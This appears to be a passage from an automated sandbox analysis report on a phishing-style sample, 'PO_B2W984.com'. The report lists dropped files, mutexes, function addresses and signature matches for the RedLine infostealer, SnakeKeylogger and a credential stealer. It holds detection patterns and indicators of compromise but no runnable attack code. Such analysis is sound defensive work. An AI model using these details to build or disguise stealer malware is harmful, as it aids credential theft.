                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_00EA946F6_2_00EA946F
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_0521A5586_2_0521A558
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052184006_2_05218400
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052107C86_2_052107C8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052110A86_2_052110A8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052142106_2_05214210
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_0521C9E86_2_0521C9E8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052164576_2_05216457
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052176E86_2_052176E8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052176F86_2_052176F8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_0521A1006_2_0521A100
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052141FF6_2_052141FF
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_0521001B6_2_0521001B
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052100406_2_05210040
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_0521A0F46_2_0521A0F4
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052193E86_2_052193E8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052183F16_2_052183F1
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052193F86_2_052193F8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052172A06_2_052172A0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052172906_2_05217290
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05219CA86_2_05219CA8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05219C986_2_05219C98
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05218FA06_2_05218FA0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05217FA86_2_05217FA8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05218F906_2_05218F90
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05217F986_2_05217F98
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05216E386_2_05216E38
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05216E486_2_05216E48
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052109E86_2_052109E8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052198406_2_05219840
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_052198506_2_05219850
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05218B386_2_05218B38
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05217B406_2_05217B40
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05218B486_2_05218B48
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 6_2_05217B506_2_05217B50
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06CCAAA87_2_06CCAAA8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06CCE5D87_2_06CCE5D8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06CCAA997_2_06CCAA99
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 12_2_02E120C412_2_02E120C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_00408C6015_2_00408C60
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_0040DC1115_2_0040DC11
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_00407C3F15_2_00407C3F
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_00418CCC15_2_00418CCC
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_00406CA015_2_00406CA0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_004028B015_2_004028B0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_0041A4BE15_2_0041A4BE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_0041824415_2_00418244
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_0040165015_2_00401650
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_00402F2015_2_00402F20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_004193C415_2_004193C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_0041878815_2_00418788
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_00402F8915_2_00402F89
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_00402B9015_2_00402B90
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_004073A015_2_004073A0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_2D4B102015_2_2D4B1020
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_2D4B103015_2_2D4B1030
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_306647A815_2_306647A8
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_2_306647B815_2_306647B8
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_00408C6015_1_00408C60
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_0040DC1115_1_0040DC11
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_00407C3F15_1_00407C3F
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_00418CCC15_1_00418CCC
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_00406CA015_1_00406CA0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_004028B015_1_004028B0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_0041A4BE15_1_0041A4BE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_0041824415_1_00418244
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_0040165015_1_00401650
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_00402F2015_1_00402F20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_004193C415_1_004193C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_0041878815_1_00418788
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_00402F8915_1_00402F89
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_00402B9015_1_00402B90
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 15_1_004073A015_1_004073A0
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 16_2_02E220C416_2_02E220C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00408C6019_2_00408C60
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0040DC1119_2_0040DC11
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00407C3F19_2_00407C3F
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00418CCC19_2_00418CCC
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00406CA019_2_00406CA0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_004028B019_2_004028B0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0041A4BE19_2_0041A4BE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0041824419_2_00418244
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0040165019_2_00401650
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00402F2019_2_00402F20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_004193C419_2_004193C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_0041878819_2_00418788
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00402F8919_2_00402F89
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_00402B9019_2_00402B90
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_004073A019_2_004073A0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_3064940019_2_30649400
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_3064102019_2_30641020
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_3064103019_2_30641030
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_337647B819_2_337647B8
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_2_337647A819_2_337647A8
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00408C6019_1_00408C60
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0040DC1119_1_0040DC11
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00407C3F19_1_00407C3F
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00418CCC19_1_00418CCC
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00406CA019_1_00406CA0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_004028B019_1_004028B0
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0041A4BE19_1_0041A4BE
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0041824419_1_00418244
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0040165019_1_00401650
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00402F2019_1_00402F20
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_004193C419_1_004193C4
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_0041878819_1_00418788
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00402F8919_1_00402F89
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_00402B9019_1_00402B90
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 19_1_004073A019_1_004073A0
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Microsofts.exe DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02E146A4 appears 154 times
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02E1480C appears 619 times
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02E28798 appears 48 times
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02E246A4 appears 154 times
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02E38798 appears 48 times
                          Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: String function: 02E2480C appears 619 times
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: String function: 02DD46A4 appears 244 times
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: String function: 02DD480C appears 931 times
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: String function: 02DE881C appears 45 times
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: String function: 02DD44AC appears 73 times
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: String function: 02DE8798 appears 54 times
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: String function: 02DD44D0 appears 32 times
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040FB9C appears 50 times
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040D606 appears 120 times
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: String function: 0040E1D8 appears 220 times
                          Source: PO_B2W984.com, 00000000.00000003.22954746218.0000000021C6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E7B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22962479852.0000000021C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000000.22893328137.0000000000539000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22954746218.0000000021C3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000002.22981376617.000000007E730000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000002.22980607454.0000000021F86000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000002.22982441152.000000007ED59000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000002.22975988044.0000000020C69000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000002.22975988044.0000000020CFE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22897566569.000000007EE4D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22897566569.000000007ED20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22954160582.000000007E809000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22956781562.000000002203F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22898203458.000000007EC38000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
                          Source: PO_B2W984.com, 00000000.00000003.22954500329.000000007FBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs PO_B2W984.com
                          Source: PO_B2W984.comBinary or memory string: OriginalFilenamemsedge.exe> vs PO_B2W984.com
                          Source: PO_B2W984.comStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: 4.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 15.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 15.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 19.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 4.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 19.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 15.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 15.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 19.2.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 6.0.Microsofts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 19.2.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000013.00000002.23176421665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 0000000F.00000002.23100866629.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 0000000F.00000001.23060773301.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 00000013.00000001.23140173632.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: Process Memory Space: Microsofts.exe PID: 4824, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: Microsofts.exe.4.dr, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Microsofts.exe.4.dr, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 4.3.rpkhzpuO.pif.2761c6f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 15.2.rpkhzpuO.pif.2d5d4e5e.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: 15.3.rpkhzpuO.pif.2b733e10.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                          Source: PO_B2W984.com, Oupzhkpr.PIF.0.drBinary or memory string: oW.Sln
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winCOM@33/17@4/3
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DD7F54 GetDiskFreeSpaceA,0_2_02DD7F54
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004019F0 OleInitialize,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,FreeResource,SizeofResource,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,4_1_004019F0
                          Source: C:\Users\user\Desktop\PO_B2W984.comCode function: 0_2_02DE6D48 CoCreateInstance,0_2_02DE6D48
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 4_1_004019F0 OleInitialize,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,SizeofResource,FreeResource,SizeofResource,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,#9,#9,#9,4_1_004019F0
                          Source: C:\Users\user\Desktop\PO_B2W984.comFile created: C:\Users\Public\OupzhkprF.cmdJump to behavior
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:304:WilStaging_02
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:304:WilStaging_02
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:304:WilStaging_02
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:304:WilStaging_02
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:816:304:WilStaging_02
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to behavior
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A4_1_00413780
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A15_2_00413780
                          Source: C:\Users\Public\Libraries\rpkhzpuO.pifCommand line argument: 08A15_2_00413780
